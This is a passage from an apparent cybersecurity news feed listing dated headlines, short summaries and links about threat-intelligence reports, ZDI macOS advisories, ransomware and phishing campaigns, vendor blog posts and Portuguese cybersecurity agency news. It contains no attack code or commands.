infrastructure all highlight the adaptable strategies employed by DPRK IT workers. In response to heightened awareness of the threat within the United States, they've established a global ecosystem of fraudulent personas to enhance operational agility. Coupled with the discovery of facilitators in the UK, this suggests the rapid formation of a global infrastructure and support network that empowers their continued operations. For detailed mitigation and detection strategies, please read our previous report on DPRK IT workers. For even more details, read our IT worker Transform post.

https://cloud.google.com/blog/topics/threat-intelligence/dprk-it-workers-expanding-scope-scale/
Best DataTheorem Alternatives for Mobile Application Security in 2025
2025-04-01T11:54:50Z | 1743508490

DataTheorem’s Mobile Secure is a Mobile Application Security Testing (MAST) tool designed for DevSecOps teams. It offers automated security analysis for iOS and Android apps, detecting vulnerabilities in application code, backend APIs, and third-party libraries.

https://www.appknox.com/blog/top-datatheorem-alternatives
UAC-0219: кібершпигунство з використанням PowerShell-стілеру WRECKSTEEL (CERT-UA#14283)
2025-04-01T10:45:52Z | 1743504352

Протягом березня 2025 року зафіксовано щонайменше три кібератаки у відношенні органів державного управління та об'єктів критичної інфраструктури України, що мали на меті збір та викрадення інформації з комп'ютерів із застосуванням відповідних програмних засобів.

https://cert.gov.ua/article/6282902
TransUnion Completes Acquisition of Credit Prequalification and Distribution Platform Monevo
2025-04-01T10:45:38Z | 1743504338

TransUnion (NYSE:TRU) today announced the completion of the acquisition of Monevo from Quint Group Limited. The news follows January’s announcement that TransUnion had signed a definitive agreement to acquire U.K.-based Monevo, a credit prequalification and distribution platform that empowers lenders and banks to deliver highly personalised credit offers to consumers via comparison websites and other third parties. TransUnion had previously held 30% of the equity of Monevo after acquiring a minority stake in 2021.  “We are delighted to welcome Monevo into the TransUnion family,” said Steve Chaouki, President, U.S. Markets, TransUnion. “We anticipate that Monevo’s platform will enhance our portfolio and our proposition to lenders. Prequalification, or eligibility, is critical to the consumer lending process, which supports our mission to make trust possible in global commerce and helps us to deliver on our wider goal of using Information for Good ®.”  Monevo’s platform enables comparison websites and other online brands known as publishers to embed highly personalised credit offers, predominantly in the U.K. and U.S. markets. Working with over 150 banks and credit providers globally, Monevo’s centralised technology and decisioning infrastructure integrates lenders and publishers, allowing them to deliver better outcomes to consumers who are searching online for credit offers. Those consumers are able to see their likelihood of being approved for credit products before applying with lenders, instilling confidence and removing unnecessary searches that have the potential to impact their credit scores adversely.   “Monevo’s proposition enables credit distribution for some of the world's largest banks and lenders, supporting our aim to improve access to credit for consumers,” said Madhu Kejriwal, Regional President, TransUnion U.K. & Europe. “We expect that the acquisition will further enable publishers and lenders to benefit from improved economics, while consumers experience a more compelling and personalised online credit shopping experience – receiving tailored offers that won’t impact their credit scores.”  “Today Monevo powers credit distribution for some of the world’s largest banks and lenders, achieved through a world-class technology platform and powerful, mutually beneficial relationships in both the U.S. and U.K. markets,” said Greg Cox, Founder & CEO of Quint Group and Monevo. “This acquisition is the natural next step for Monevo. With TransUnion, we expect that the business will be able to leverage new resources and access new markets, allowing it to continue to realise its potential and improve access to credit on a global scale.” The terms of the transaction have not been disclosed. The transaction was funded via existing cash-on-hand and is not expected to have a material impact on leverage, liquidity or TransUnion’s 2025 operating results.   About TransUnion (NYSE: TRU) TransUnion is a global information and insights company with over 13,000 associates operating in more than 30 countries, including the United Kingdom. We make trust possible by ensuring each person is reliably represented in the marketplace. We do this by providing an actionable view of consumers, stewarded with care. Through our acquisitions and technology investments we have developed innovative solutions that extend beyond our strong foundation in core credit into areas such as marketing, fraud, risk and advanced analytics. As a result, consumers and businesses can transact with confidence and achieve great things. We call this Information for Good® — and it leads to economic opportunity, great experiences and personal empowerment for millions of people around the world. For more information, visit www.transunion.com  TransUnion Forward-Looking Statements This press release contains forward-looking statements within the meaning of the Private Securities Litigation Reform Act of 1995. These statements are based on the current beliefs and expectations of TransUnion’s management and are subject to significant risks and uncertainties. Actual results may differ materially from those described in the forward-looking statements. Any statements made in this press release that are not statements of historical fact, including statements about our beliefs and expectations, are forward-looking statements. Forward-looking statements include information concerning possible or assumed future results of operations, including our guidance and descriptions of our business plans and strategies. These statements often include words such as “anticipate,” “expect,” “guidance,” “suggest,” “plan,” “believe,” “intend,” “estimate,” “target,” “project,” “should,” “could,” “would,” “may,” “will,” “forecast,” “outlook,” “potential,” “continues,” “seeks,” “predicts,” or the negatives of these words and other similar expressions. Factors that could cause actual results to differ materially from those described in the forward-looking statements include: failure to realise the synergies and other benefits expected from the acquisition of Monevo; the possibility that the acquisition, including the integration of Monevo, may be more costly to complete than anticipated; business disruption following the acquisition closing; risks related to disruption of management time from ongoing business operations and other opportunities due to the acquisition; the effects of pending and future legislation and regulatory actions and reforms; macroeconomic and industry trends and adverse developments in the debt, consumer credit and financial services markets and other macroeconomic factors beyond TransUnion’s control; risks related to TransUnion’s indebtedness, including our ability to make timely payments of principal and interest and our ability to satisfy covenants in the agreements governing our indebtedness; and other one-time events and other factors that can be found in our Annual Report on Form 10-K for the year ended December 31, 2024, and any subsequent Quarterly Report on Form 10-Q or Current Report on Form 8-K, which are filed with the Securities and Exchange Commission and are available on TransUnion’s website (www.transunion.com/tru) and on the Securities and Exchange Commission’s website (www.sec.gov). Many of these factors are beyond our control. The forward-looking statements contained in this press release speak only as of the date of this press release. We undertake no obligation to publicly release the result of any revisions to these forward-looking statements to reflect the impact of events or circumstances that may arise after the date of this press release.

https://newsroom.transunion.co.uk/transunion-completes-acquisition-of-credit-prequalification-and-distribution-platform-monevo/
Qilin affiliates spear-phish MSP ScreenConnect admin, targeting customers downstream
2025-04-01T10:30:52Z | 1743503452

Attack matches three-year long pattern of ScreenConnect attacks tracked by Sophos MDR as STAC4365.

https://news.sophos.com/en-us/2025/04/01/sophos-mdr-tracks-ongoing-campaign-by-qilin-affiliates-targeting-screenconnect/
XSS To RCE By Abusing Custom File Handlers - Kentico Xperience CMS (CVE-2025-2748)
2025-04-01T09:58:33Z | 1743501513

We know what you’re waiting for - this isn’t it. Today, we’re back with more tales of our adventures in Kentico’s Xperience CMS. Due to it’s wide usage, the type of solution, and the types of enterprises using this solution

https://labs.watchtowr.com/xss-to-rce-by-abusing-custom-file-handlers-kentico-xperience-cms-cve-2025-2748/
Protective DNS for the private sector
2025-04-01T08:25:06Z | 1743495906

Advice on the selection and deployment of Protective Domain Name Systems (DNS).

https://www.ncsc.gov.uk/guidance/protective-dns-for-private-sector
ZDI-25-188: Apple macOS AudioToolboxCore WAV File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability
2025-04-01T05:00:00Z | 1743483600

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. Interaction with the AudioToolboxCore library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2025-24244.

http://www.zerodayinitiative.com/advisories/ZDI-25-188/
ZDI-25-189: Apple macOS AudioToolbox AMR File Parsing Memory Corruption Remote Code Execution Vulnerability
2025-04-01T05:00:00Z | 1743483600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-24243.

http://www.zerodayinitiative.com/advisories/ZDI-25-189/
ZDI-25-190: Apple macOS MP4 File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability
2025-04-01T05:00:00Z | 1743483600

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2025-24230.

http://www.zerodayinitiative.com/advisories/ZDI-25-190/
ZDI-25-191: Apple macOS MP4 File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability
2025-04-01T05:00:00Z | 1743483600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-24211.

http://www.zerodayinitiative.com/advisories/ZDI-25-191/
ZDI-25-192: Apple macOS MP4 File Parsing Memory Corruption Remote Code Execution Vulnerability
2025-04-01T05:00:00Z | 1743483600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-24190.

http://www.zerodayinitiative.com/advisories/ZDI-25-192/
ZDI-25-193: Apple macOS CoreText Font Glyphs Parsing Out-Of-Bounds Read Information Disclosure Vulnerability
2025-04-01T05:00:00Z | 1743483600

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2025-24182.

http://www.zerodayinitiative.com/advisories/ZDI-25-193/
ZDI-25-194: Apple macOS AppleIntelKBLGraphics Time-Of-Check Time-Of-Use Information Disclosure Vulnerability
2025-04-01T05:00:00Z | 1743483600

This vulnerability allows local attackers to disclose sensitive information on affected installations of Apple macOS. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.4. The following CVEs are assigned: CVE-2025-24256.

http://www.zerodayinitiative.com/advisories/ZDI-25-194/
ZDI-25-195: Apple macOS CoreGraphics Image Parsing Out-Of-Bounds Read Information Disclosure Vulnerability
2025-04-01T05:00:00Z | 1743483600

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2025-24210.

http://www.zerodayinitiative.com/advisories/ZDI-25-195/
ZDI-25-196: Apple macOS ICC Profile Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability
2025-04-01T05:00:00Z | 1743483600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-24185.

http://www.zerodayinitiative.com/advisories/ZDI-25-196/
High Threat Security Alert (A25-04-01): Multiple Vulnerabilities in Apple Products
2025-04-01T04:00:00Z | 1743480000

Apple has released iOS 15.8.4, iPadOS 15.8.4, iOS 18.3.2, iOS 16.7.11, iPadOS 16.7.11, iPadOS 17.7.6, iOS 18.4, iPadOS 18.4, macOS Sequoia 15.4, macOS Sonoma 14.7.5, Safari 18.4, visionOS 2.4, tvOS 18.4 and Xcode 16.3 to fix the multiple vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Outlaw Linux Malware: Persistent, Unsophisticated, and Surprisingly Effective
2025-04-01T00:00:00Z | 1743465600

Outlaw is a persistent Linux malware leveraging simple brute-force and mining tactics to maintain a long-lasting botnet.

https://www.elastic.co/security-labs/outlaw-linux-malware
How Threat Actors Weaponize EV Certificates by Lucie Cardiet
2025-04-01T00:00:00Z | 1743465600

Attackers abuse EV certificates to sign malware and evade detection. Learn how they steal, use, and automate trusted code signing for ransomware.

https://www.vectra.ai/blog/how-threat-actors-weaponize-ev-certificates
Adaptive Network Adversaries in a Restructured Federal Landscape by Lucie Cardiet
2025-04-01T00:00:00Z | 1743465600

Safeguard your federal network from state-sponsored APTs and internal vulnerabilities with advanced NDR with purpose-built AI.

https://www.vectra.ai/blog/adaptive-network-adversaries-in-a-restructured-federal-landscape
Heightened In-The-Wild Activity On Key Technologies Observed On March 28
2025-04-01T00:00:00Z | 1743465600

On March 28, GreyNoise observed a significant spike in activity targeting multiple edge technologies, including SonicWall, Zoho, Zyxel, F5, Linksys, and Ivanti systems. While some of these technologies are edge systems, others are primarily internal management tools.

https://www.greynoise.io/blog/heightened-in-the-wild-activity-key-technologies
Notice on Rotating Chair Tenure
2025-03-31T16:30:00Z | 1743438600

In accordance with Huawei's Rotating Chair system and business strategy arrangements, Mr. Eric Xu will assume the position of Rotating and Acting Chair of Huawei from April 1 to September 30, 2025

//www.huawei.com/en/news/2025/3/rotating-chairman
Cyber Security and Resilience Policy Statement to strengthen regulation of critical sectors
2025-03-31T15:53:07Z | 1743436387

New proposals will combat the growing threat to UK critical national infrastructure (CNI).

https://www.ncsc.gov.uk/blog-post/cyber-security-resilience-bill-policy-statement
LABScon24 Replay | A Walking Red Flag (With Yellow Stars)
2025-03-31T13:00:23Z | 1743426023

Dakota Cary and Eugenio Benincasa explore China's CTF ecosystem, highlighting competitions held by the Ministry of State Security and the PLA.

https://www.sentinelone.com/labs/labscon24-replay-a-walking-red-flag-with-yellow-stars/
Vulnerability affecting Next.js web development framework
2025-03-31T12:50:03Z | 1743425403

The NCSC is encouraging UK organisations to take immediate action to mitigate a vulnerability (CVE-2025-29927) affecting the Next.js framework used to build web applications.

https://www.ncsc.gov.uk/news/vulnerability-affecting-nextjs-web-development-framework
Meta is not adequately meeting the demands of CERT Polska
2025-03-31T12:45:00Z | 1743425100

The problem of scammers exploiting social media platforms continues to persist. Meta has yet to fulfill all the recommendations made last year by experts from the CERT Polska team at NASK, which were intended to enhance the safety of Polish social media users.

https://cert.pl/en/posts/2025/03/evaluation-of-expectations-towards-meta/
This month in security with Tony Anscombe – March 2025 edition
2025-03-31T10:46:09Z | 1743417969

From an exploited vulnerability in a third-party ChatGPT tool to a bizarre twist on ransomware demands, it's a wrap on another month filled with impactful cybersecurity news

https://www.welivesecurity.com/en/videos/month-security-tony-anscombe-march-2025-edition/
Feberis Pro: The Ultimate 4-in-1 Expansion Board for Flipper Zero
2025-03-31T10:36:12Z | 1743417372

In a previous blog post, I introduced Feberis, a versatile expansion board that enhanced the capabilities of the Flipper Zero by offering additional communication protocols. Now, I am excited to dive into the newly released Feberis Pro, a next-generation expansion module designed and distributed by Sapsan-Sklep. This blog will cover what Feberis Pro is, how […] The post Feberis Pro: The Ultimate 4-in-1 Expansion Board for Flipper Zero first appeared on Mobile Hacker.

https://www.mobile-hacker.com/2025/03/31/feberis-pro-the-ultimate-4-in-1-expansion-board-for-flipper-zero/
Huawei Releases 2024 Annual Report: Performance in Line with Forecast
2025-03-31T10:25:00Z | 1743416700

Huawei released its 2024 Annual Report today. The company reports that its performance was in line with forecast.

//www.huawei.com/en/news/2025/3/annual-report-2024
Resilience in the face of ransomware: A key to business survival
2025-03-31T09:00:00Z | 1743411600

Your company’s ability to tackle the ransomware threat head-on can ultimately be a competitive advantage

https://www.welivesecurity.com/en/business-security/resilience-face-ransomware-key-business-survival/
Cyber Weather, February 2025
2025-03-31T07:15:42Z | 1743405342

Cyber weather in February was mainly rainy, almost sleety, despite a few glimpses of the sun. CEO fraud, phishing campaigns in the name of public authorities and M365 account breaches continued in February.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_02/2025
Cyber Weather, February 2025
2025-03-31T07:15:42Z | 1743405342

Cyber weather in February was mainly rainy, almost sleety, despite a few glimpses of the sun. CEO fraud, phishing campaigns in the name of public authorities and M365 account breaches continued in February.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_02/2025
CVE-2025-26683 Azure Playwright Elevation of Privilege Vulnerability
2025-03-31T07:00:00Z | 1743404400

Improper authorization in Azure Playwright allows an unauthorized attacker to elevate privileges over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26683
From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic
2025-03-31T07:00:00Z | 1743404400

This post was originally distributed as a private FLINT report to our customers on 21 March 2025. The report detailed findings about the Lazarus ClickFake Interview campaign. Introduction In March 2025, Bybit, an UAE-based crypto exchange platform, was targeted by Lazarus, a state-sponsored intrusion set attributed to the Democratic People’s Republic of Korea (DPRK), leading […] La publication suivante From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic est un article de Sekoia.io Blog.

https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/
Why Manufacturing Needs SASE: Securing Smart Factories and Global Operations
2025-03-31T06:26:45Z | 1743402405

Imagine you’re the Director of IT for a global manufacturing company. You must keep production sites, suppliers, and remote workers securely connected while controlling costs and meeting compliance. Every day, new challenges arise:   If this sounds familiar, you’re not alone. Manufacturing is rapidly evolving with Industry 4.0, where smart factories use automation, IoT, AI analytics,... The post Why Manufacturing Needs SASE: Securing Smart Factories and Global Operations appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-manufacturing-needs-sase/
Surge in Palo Alto Networks Scanner Activity Indicates Possible Upcoming Threats
2025-03-31T00:00:00Z | 1743379200

Over the last 30 days, nearly 24,000 unique IP addresses have attempted to access these portals. The pattern suggests a coordinated effort to probe network defenses and identify exposed or vulnerable systems, potentially as a precursor to targeted exploitation.

https://www.greynoise.io/blog/surge-palo-alto-networks-scanner-activity
Why East/West Traffic Needs Zero Trust
2025-03-30T07:21:57Z | 1743319317

Zero trust is no longer just a concept—it’s essential. With cloud adoption, hybrid work, and increasingly sophisticated cyber threats, traditional perimeter security no longer suffices. Attackers exploit vulnerabilities inside networks, moving laterally undetected. Many organizations focus on securing north-south external-facing interactions while failing to monitor internal east-west traffic. This oversight exposes networks to ransomware, insider... The post Why East/West Traffic Needs Zero Trust appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-east-west-traffic-needs-zero-trust/
Cyber threats to elections
2025-03-28T15:06:05Z | 1743174365

Resources to learn more about cyber threats to elections and mitigate their impacts

https://cyber.gc.ca/en/guidance/cyber-threats-elections
Taking control of monetization
2025-03-28T13:15:00Z | 1743167700

Monetization is the most pressing challenge in the industry—for operators and for most ecosystem players—but also a stubbornly elusive target. Network capacity and coverage have expanded significantly, supporting a sustained increase in traffic and subscribership. Over 70% of people worldwide have mobile connectivity...

https://www.netscout.com/blog/taking-control-monetization
The Hidden Gems of ITSM: Features That Matter Most
2025-03-28T12:34:36Z | 1743165276

Service management doesn't have to just be a buzzword. It can be a foundation of efficient operations where IT Service Management (ITSM) plays a crucial role in keeping businesses running smoothly. But what truly sets exceptional ITSM apart from the rest? It’s not just about having a sleek user interface — it’s about the powerful features and functionalities that operate beneath the surface, improving user satisfaction and driving operational excellence. From automated incident management to self-healing capabilities, the true power of ITSM lies in its ability to anticipate and resolve issues before they become problems. The power underneath: what truly matters Beneath the surface of sleek interfaces and user-friendly designs lies what makes service management indispensable. While a polished UI can improve the user experience, it’s the underlying functionality and efficiency that determines the success of any service management system. For employees, it’s the speed and effectiveness with which their requests are handled that matters. When an employee submits a request, they expect it to be actioned and resolved quickly. Delays lead to frustration and a decline in productivity, which ripples through the entire organization. Employees also highly value transparency and communication. They expect to be informed of the status of their requests and any potential delays. By providing regular updates and maintaining clear lines of communication, IT teams can significantly improve satisfaction and trust in the service management process. For IT professionals, the stakes are equally high. They need the right solutions to efficiently address and resolve issues. The ability to handle incidents at the initial level, often referred to as Level 0 support, is crucial. This means resolving simple issues quickly without escalating them, which can drastically reduce the number of tickets that need to be managed. In the end, the true test of employee satisfaction with the service management system is in the results it produces. The speed and efficacy with which issues are resolved, the quality of communication received, and the overall impact on their day-to-day productivity are key metrics. Beyond the Flashy UI: The Core Capabilities of Service Management The underlying architecture and processes are what actually make service management strong. At the heart of any good service management solution is the ability to streamline workflows, which can greatly increase efficiency. When processes are optimized, teams can focus on more important work, reducing the time and effort spent on mundane, repetitive tasks. This not only increases productivity, but also ensures that the IT department can respond more effectively to the needs of the business. Automated incident management is another critical component that often goes unnoticed. By automating the detection and resolution of issues, organizations can drastically reduce response times.  These self-healing capabilities are a game-changer in modern service management. Ensuring that problems are identified and remediated before users even log them, leading to higher user satisfaction. Additionally, users are less likely to experience disruptions, and when issues do arise, they are resolved quickly and efficiently. This proactive approach not only improves the user experience but also helps in maintaining a positive perception of the IT department. Integration capabilities are another essential aspect that often gets overlooked. A service management solution that seamlessly integrates with various enterprise applications and services ensures all components work in harmony. This eliminates silos and ensures that data flows smoothly across the organization, improving overall operational efficiency. However, it’s important to note that not all vendors deliver on their low-code/no-code promises. While many claim to offer these features, the reality often involves more coding than advertised. True low-code/no-code solutions should minimize the need for extensive coding, making it easier for IT teams to deploy and manage services without requiring deep technical expertise. The digital employee experience is more than just surveys. It involves a comprehensive 360-degree view of how employees interact with various aspects of the service management system, including applications, security and devices. Proactively identifying and addressing issues across these areas can significantly improve the overall employee experience. Features that make service management great But what are the specific features that elevate service management from a mere tool to an indispensable solution? One of the most transformative features is automation. By automating routine tasks and ticket resolution processes, service management solutions can significantly improve user satisfaction while reducing the workload on IT teams. Self-service portals are another game-changer. These portals empower users to resolve simple issues on their own, such as password resets or software installations, without needing to involve the IT department. Advanced analytics are also crucial for modern service management. By providing deep insights into service performance and user behavior, these analytics enable organizations to proactively address issues before they become major problems. For example, predictive analytics can identify patterns that may indicate an impending system failure, allowing IT teams to take preventive action. Mobile access is also key. With the increasing mobility of the workforce, it’s essential that IT support is always available, no matter where users are. Mobile-friendly service management platforms enable users to submit tickets, track progress and receive updates on the go. Finally, AI is increasingly becoming a crucial aspect of successful service management. AI-driven tools can automate more complex tasks, provide intelligent recommendations and even predict and resolve issues before users are even aware of them. However, it’s crucial that these AI systems are transparent and trustworthy, ensuring they operate ethically and in the best interests of the organization and its users. How Ivanti Helps This is where Ivanti comes in. We provide a suite of solutions that not only make service management more efficient but also enhance the core aspects of service management. We do this through our AI-driven service management capabilities that make the service desk smarter, faster and more efficient. With AI-driven capabilities, we can summarize incidents and tickets, generate knowledge articles, classify incidents and even create dashboard widgets. In today’s digital world, security is top of mind for all organizations. That’s why we’re the only ITSM vendor to have signed the Secure by Design pledge. We don’t just say we’re secure — we build security into our products. Our robust security is complemented by our extensive enterprise integration capabilities. With over 1,000 connectors, our platform can seamlessly integrate with a wide range of third-party systems, both IT and non-IT. Our low-code/no-code approach, powered by the leading iPaaS platform, makes it easy to extend ITSM automation and workflow to external systems without requiring deep technical expertise. In addition, we offer five out-of-the-box (OOTB) enterprise workflows for HR, facilities, project portfolio management (PPM), governance, risk, and compliance (GRC) and security operations. These aren't just templates — they're fully functional business objects that can be customized to meet your specific organizational needs. The low-code visual editor is a powerful feature that allows organizations to build and modify workflows across all IT and non-IT processes. This capability allows for the creation of custom solutions that align with unique business requirements, minimizing administrative effort and maximizing productivity. The platform’s integrated DevOps capability, with OOTB bi-directional connectors for Jira, Azure DevOps, GitHub and Jenkins, extends this flexibility to DevSecOps. One of the most innovative aspects of Ivanti’s platform is its self-healing capabilities. Proactive service management ensures that issues are identified and resolved before they impact users, significantly reducing mean time to resolution (MTTR). This proactive approach not only improves service quality but also improves the overall digital employee experience. Ivanti is the only ITSM vendor that measures the digital employee experience, providing insights into employee sentiment and the performance of devices, applications and security measures. In a landscape of rapid technological change, Ivanti’s solutions offer the flexibility and security required to lead the pack. Through the power of advanced AI, resilient security and seamless integration, Ivanti equips organizations to deliver exceptional service and spearhead digital transformation with confidence. Want to learn more? Check out our webinar, Beyond the Surface: Unveiling the True Power of ITSM, to take a fresh look and elevate your service management game to gain a competitive edge.

https://www.ivanti.com/blog/itsm-features-that-matter
Two vulnerabilities in Streamsoft Prestiż software
2025-03-28T11:00:00Z | 1743159600

CERT Polska has received a report about 2 vulnerabilities (CVE-2024-11504 and CVE-2024-7407) found in Streamsoft Prestiż software.

https://cert.pl/en/posts/2025/03/CVE-2024-7407/
ClickFix: Another Deceptive Social Engineering Technique
2025-03-28T10:29:17Z | 1743157757

Fast FactsClickFix, first observed in mid-2024, represents a sophisticated form of social engineering that quickly gained traction among adversaries.ClickFix has distributed various malware families, including DarkGate, Lumma Stealer, AsyncRAT, Danabot, and NetSupport RAT.Nation-state actors such as Iran-linked MuddyWater and Russia-linked APT28 have adopted the ClickFix technique in their cyber espionage campaigns.Adversaries have been observed using [...] The post ClickFix: Another Deceptive Social Engineering Technique appeared first on Logpoint.

https://www.logpoint.com/en/blog/emerging-threats/clickfix-another-deceptive-social-engineering-technique/
ClickFix: Another Deceptive Social Engineering Technique
2025-03-28T10:29:17Z | 1743157757

Fast FactsClickFix, first observed in mid-2024, represents a sophisticated form of social engineering that quickly gained traction among adversaries.ClickFix has distributed various malware families, including DarkGate, Lumma Stealer, AsyncRAT, Danabot, and NetSupport RAT.Nation-state actors such as Iran-linked MuddyWater and Russia-linked APT28 have adopted the ClickFix technique in their cyber espionage campaigns.Adversaries have been observed using [...] The post ClickFix: Another Deceptive Social Engineering Technique appeared first on Logpoint.

https://www.logpoint.com/en/blog/emerging-threats/clickfix-another-deceptive-social-engineering-technique/
Making it stick: How to get the most out of cybersecurity training
2025-03-28T10:00:00Z | 1743156000

Security awareness training doesn’t have to be a snoozefest – games and stories can help instill ‘sticky’ habits that will kick in when a danger is near

https://www.welivesecurity.com/en/business-security/making-it-stick-get-most-cybersecurity-training/
Robots Refresher: Future-proof Robots Exclusion Protocol
2025-03-28T10:00:00Z | 1743156000

In the previous posts about the Robots Exclusion Protocol (REP) we explored what's already possible to do with its various components — namely robots.txt and the URI level controls. In this post we will explore how the REP can play a supporting role in the ever-evolving relation between automatic clients and the human web.

https://developers.google.com/search/blog/2025/03/robots-future
Stealing user credentials with evilginx
2025-03-28T07:29:26Z | 1743146966

A malevolent mutation of the widely used nginx web server facilitates Adversary-in-the-Middle action, but there’s hope

https://news.sophos.com/en-us/2025/03/28/stealing-user-credentials-with-evilginx/
Security Alert (A25-03-25): Vulnerability in Firefox
2025-03-28T04:00:00Z | 1743134400

Mozilla has published an advisory (MFSA2025-19) to address a vulnerability in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Apache Tomcat: CVE-2025-24813
2025-03-28T00:00:00Z | 1743120000

Learn about CVE-2025-24813 affecting Apache Tomcat products. Patch now to prevent remote code execution.

https://www.recordedfuture.com/blog/apache-tomcat-cve-2025-24813-vulnerability-analysis
Centro de Competências em Cibersegurança dos Açores inaugura espaço
2025-03-28T00:00:00Z | 1743120000

Foi, hoje, oficialmente inaugurado o espaço do Centro de Competências em Cibersegurança dos Açores (CCC-Açores), localizado nas instalações da Nonagon, no Parque de Ciência e Tecnologia da ilha de S. Miguel. A cerimónia, que assinalou este arranque oficial, contou com a presença de Pedro Batista, Diretor Regional das Comunicações e da Transição Digital, em representação do Governo Regional dos Açores e de Lino Santos, coordenador do Centro Nacional de Cibersegurança (CNCS). Para assinalar o início da sua atividade, o CCC-Açores promoveu, durante a manhã, uma ação de capacitação destinada aos técnicos das Câmaras Municipais da Região Áutonoma dos Açores, que incidiu em temas como a conformidade legal, a certificação, gestão de riscos e oportunidades de financiamento. O Centro de Competências em Cibersegurança dos Açores (CCC-Açores) integra a rede Centros de Competência em Cibersegurança – C-Network e resulta de um consórcio que integra a Direção Regional da Comunicações e da Transição Digital (DRCTD), a Associação de Municipios da Região Autónoma dos Açores (AMRAA), a Câmara de Comércio e Indústria dos Açores e a Universidade dos Açores. Com especialistas em diversas áreas, o CCC-Açores pretende apoiar mais de 100 entidades regionais da Administração Pública e PMES, com o objetivo de promover a resiliência digital da região autónoma. Pelo espaço que é desde hoje o Centro de Competências em Cibersegurança dos Açores, passaram alguns convidados, entre os quais o presidente da Associação de Municípios da Região Autónoma dos Açores, Alexandre Gaudêncio (membro do consórcio), Luís Almeida, da administração da Nonagon, João Beleza Vaz, da ANACON, Pedro Cardoso, em representação da Polícia Judiciária, alguns membros de Entidades Intermunicipais.Saiba mais sobre o CCC-Açores no site oficial.  

https://dyn.cncs.gov.pt/pt/detalhe/art/135921/centro-de-competencias-em-ciberseguranca-dos-acores-inaugura-espaco
CNCS recebe reunião de Grupo de Trabalho Europeu para a IA
2025-03-28T00:00:00Z | 1743120000

De 26 a 28 de março, o Templo da Poesia, em Oeiras, foi palco da primeira reunião de 2025, do European Working Group of Competent Authorities on AI, do qual o Centro Nacional de Cibersegurança faz parte, que integra entidades representantes da maioria dos Estados-Membros da União, nas mais diversas áreas. É a primeira vez que Portugal e o Centro Nacional de Cibersegurança (CNCS) recebem e organizam esta reunião, que contou com o apoio da Câmara Municipal de Oeiras. É também a primeira reunião deste grupo com uma agenda para três dias, e por isso mais complexa e com mais entidades envolvidas - cerca de 40 participantes. O CNCS passou a integrar o grupo de trabalho, há dois anos, por iniciativa própria, com o objetivo de perceber os impactos da regulação da Inteligência Artificial em matérias ligadas à cibersegurança, cuidados a ter no campo das tecnologias emergentes e, por forma a evitar duplicação de procedimentos ou ações regulatórias. Atualmente, o CNCS, coordena o subgrupo para a cibersegurança da IA, dentro do Grupo Europeu alargado. Na abertura da reunião, o coordenador do CNCS, Lino Santos, reforçou o forte compromisso com este grupo de trabalho e com os seus objetivos. “O que queremos fazer é garantir a melhor articulação possível entre regulamentos, diferentes instrumentos, porque são muitos os relacionados com a cibersegurança, que nos dizem respeito” disse, frisando os benefícios que daqui advêm para os cidadãos, direitos humanos e segurança das organizações. “O meu trabalho é trazer investimento para Oeiras, a vossa missão é proteger-nos a nós e a toda a sociedade”, disse Francisco Rocha Gonçalves, vice-presidente da Câmara Municipal de Oeiras, pedindo aos membros do grupo multidisciplinar e interorganizacional para ajudar nos desafios que a IA traz, não só à sociedade, como à economia e à vida das pessoas, pública e privada. Já o Diretor-geral do Gabinete Nacional de Segurança, Contra-almirante António Gameiro Marques, depois de acompanhar a última manhã de trabalhos do grupo, fez questão de realçar a importância da cooperação dentro deste grupo, e o facto de integrar membros, com um elevado nível de conhecimento da IA, ao contrário da sociedade real, que não conhece a complexidade em torno destas matérias. Referindo a “Lei de Amara”, da autoria de um investigador americano com o mesmo nome, que diz que “tendemos a superestimar o efeito de uma tecnologia no curto prazo e a subestimar o seu efeito no longo prazo”, António Gameiro Marques, realçou “a forte responsabilidade” do grupo, em garantir que esta Lei não se aplica à Inteligência Artificial, porque “as pessoas estão a aderir à IA generativa não sabendo o que estão a fazer e quais os beneficios”. No final 